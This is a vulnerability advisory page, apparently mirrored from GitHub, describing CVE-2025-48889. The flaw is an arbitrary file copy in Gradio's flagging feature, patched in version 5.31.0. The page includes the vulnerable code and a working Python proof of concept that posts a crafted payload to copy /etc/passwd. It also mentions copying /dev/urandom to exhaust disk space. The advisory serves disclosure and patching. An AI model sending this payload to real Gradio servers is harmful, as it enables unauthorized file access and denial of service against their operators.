Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-8jw3-6x8j-v96g

Опубликовано: 29 мая 2025
Источник: github
Github: Прошло ревью
CVSS3: 5.3

Описание

Gradio Allows Unauthorized File Copy via Path Manipulation

An arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space.

Description

The flagging component doesn't properly validate file paths before copying files. Attackers can send specially crafted requests to the /gradio_api/run/predict endpoint to trigger these file copies.

Source: User-controlled path parameter in the flagging functionality JSON payload
Sink: shutil.copy operation in FileData._copy_to_dir() method

The vulnerable code flow:

  1. A JSON payload is sent to the /gradio_api/run/predict endpoint
  2. The path field within FileData object can reference any file on the system
  3. When processing this request, the Component.flag() method creates a GradioDataModel object
  4. The FileData._copy_to_dir() method uses this path without proper validation:
def _copy_to_dir(self, dir: str) -> FileData: pathlib.Path(dir).mkdir(exist_ok=True) new_obj = dict(self) if not self.path: raise ValueError("Source file path is not set") new_name = shutil.copy(self.path, dir) # vulnerable sink new_obj["path"] = new_name return self.__class__(**new_obj)
  1. The lack of validation allows copying any file the Gradio process can read

PoC

The following script demonstrates the vulnerability by copying /etc/passwd from the server to Gradio's flagged directory:

Setup a Gradio app:

import gradio as gr def image_classifier(inp): return {'cat': 0.2, 'dog': 0.8} test = gr.Interface(fn=image_classifier, inputs="image", outputs="label") test.launch(share=True)

Run the PoC:

import requests url = "https://[your-gradio-app-url]/gradio_api/run/predict" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" } payload = { "data": [ { "path": "/etc/passwd", "url": "[your-gradio-app-url]", "orig_name": "network_config", "size": 5000, "mime_type": "text/plain", "meta": { "_type": "gradio.FileData" } }, {} ], "event_data": None, "fn_index": 4, "trigger_id": 11, "session_hash": "test123" } response = requests.post(url, headers=headers, json=payload) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}")

Ссылки

Пакеты

Наименование

gradio

pip
Затронутые версииВерсия исправления

< 5.31.0

5.31.0

EPSS

Процентиль: 61%
0.00421
Низкий

5.3 Medium

CVSS3

CVE ID

CVE-2025-48889

Дефекты

CWE-434

Связанные уязвимости

nvd логотип

CVE-2025-48889

CVSS3: 5.3
nvd
8 месяцев назад

Gradio is an open-source Python package that allows quick building of demos and web application for machine learning models, API, or any arbitrary Python function. Prior to version 5.31.0, an arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. This issue has been patched in version 5.31.0.

EPSS

Процентиль: 61%
0.00421
Низкий

5.3 Medium

CVSS3

CVE ID

CVE-2025-48889

Дефекты

CWE-434